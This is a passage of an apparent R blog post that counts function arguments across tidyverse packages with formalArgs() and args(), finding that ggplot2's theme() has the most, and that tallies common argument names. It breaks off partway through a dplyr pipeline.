&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(num_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It is possible to extract the argument names of a function using the &lt;code&gt;formalArgs()&lt;/code&gt; function. However, this does not work on primitive functions&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;add&amp;#34;&lt;/span&gt;, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package:magrittr&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;augment&amp;#34;&lt;/span&gt;, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package:broom&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;x&amp;#34; &amp;#34;...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can counteract this by wrapping the function in &lt;code&gt;args()&lt;/code&gt; first. This method now works for both primitives and non-primitives&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;add&amp;#34;&lt;/span&gt;, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package:magrittr&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;e1&amp;#34; &amp;#34;e2&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;augment&amp;#34;&lt;/span&gt;, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package:broom&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;x&amp;#34; &amp;#34;...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To work out the number of these arguments we simply wrap this expression in &lt;code&gt;length()&lt;/code&gt;.&lt;/p&gt;
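&lt;p&gt;The same pattern can be checked without any tidyverse packages. The sketch below uses the base R primitive &lt;code&gt;sum()&lt;/code&gt;, which is our own choice of example rather than one from the analysis above.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;library(methods)  # formalArgs() lives in {methods}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# sum() is a primitive, so formalArgs() alone finds nothing
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;formalArgs(sum)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;## NULL
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Wrapping in args() first recovers the argument names
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;formalArgs(args(sum))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;## [1] &amp;#34;...&amp;#34;   &amp;#34;na.rm&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;length(formalArgs(args(sum)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;## [1] 2
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;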
&lt;h3 id="the-big-reveal"&gt;The big reveal&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(num_args))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 2,292 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package func num_args&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 ggplot2 theme 93&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 ggplot2 guide_colorbar 28&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 ggplot2 guide_colourbar 28&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 ggplot2 guide_legend 21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 rstudioapi launcherSubmitJob 21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 ggplot2 geom_dotplot 19&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 ggplot2 geom_boxplot 18&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 readr read_delim_chunked 18&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 readr read_delim 17&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 readr spec_delim 17&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # … with 2,282 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So it turns out that &lt;code&gt;theme()&lt;/code&gt; from {ggplot2} is king of the arguments, by a mile! The largest per package looks like this&lt;/p&gt;
&lt;img class="image-center" src="counting-arguments-1.jpg" style="width:550px; class:image-center"&gt;
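&lt;p&gt;The code behind this plot is not shown. One possible way to find the function with the most arguments in each package, assuming {dplyr} 1.0.0 or later for &lt;code&gt;slice_max()&lt;/code&gt;, is sketched below. The &lt;code&gt;toy&lt;/code&gt; tibble reuses four rows from the output above and stands in for &lt;code&gt;pkg&lt;/code&gt;; this is not necessarily how the figure was produced.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;library(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Toy stand-in for pkg (assumption): four rows copied from the output above
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;toy = tibble(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  package = c(&amp;#34;ggplot2&amp;#34;, &amp;#34;ggplot2&amp;#34;, &amp;#34;readr&amp;#34;, &amp;#34;readr&amp;#34;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  func = c(&amp;#34;theme&amp;#34;, &amp;#34;guide_legend&amp;#34;, &amp;#34;read_delim_chunked&amp;#34;, &amp;#34;read_delim&amp;#34;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  num_args = c(93, 21, 18, 17)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Keep the row with the largest num_args within each package
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;top = toy %&amp;gt;%
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  group_by(package) %&amp;gt;%
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  slice_max(num_args, n = 1) %&amp;gt;%
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  ungroup()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;top
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;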
&lt;hr&gt;
&lt;p&gt;We’re not done there! The 9 packages with the most functions are&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;largest &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;(package)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;largest
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;rlang&amp;#34; &amp;#34;ggplot2&amp;#34; &amp;#34;dplyr&amp;#34; &amp;#34;purrr&amp;#34; &amp;#34;lubridate&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [6] &amp;#34;dbplyr&amp;#34; &amp;#34;readr&amp;#34; &amp;#34;rstudioapi&amp;#34; &amp;#34;httr&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For each of these packages, we can plot a histogram of the number of arguments in each function like so&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; largest) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; num_args)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_histogram&lt;/span&gt;(binwidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;steelblue&amp;#34;&lt;/span&gt;, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlim&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;25&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="counting-arguments-2.jpg" style="width:550px; class:image-center"&gt;
&lt;hr&gt;
&lt;p&gt;We can go a step further and retrieve the argument names as well. To do this we use the same technique as before with the functions&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rowwise&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(arg, args, token &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;str_split,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, to_lower &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(arg) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(n))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 1,029 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## arg n&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 ... 785&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 x 698&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 data 169&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 .x 120&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 &amp;#34;&amp;#34; 102&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 n 91&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 .f 90&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 position 90&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 mapping 79&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 na.rm 79&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # … with 1,019 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The most commonly used arguments in the tidyverse are &lt;code&gt;...&lt;/code&gt; and &lt;code&gt;x&lt;/code&gt; by some distance.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rowwise&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(arg, args, token &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;str_split,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, to_lower &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(arg) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
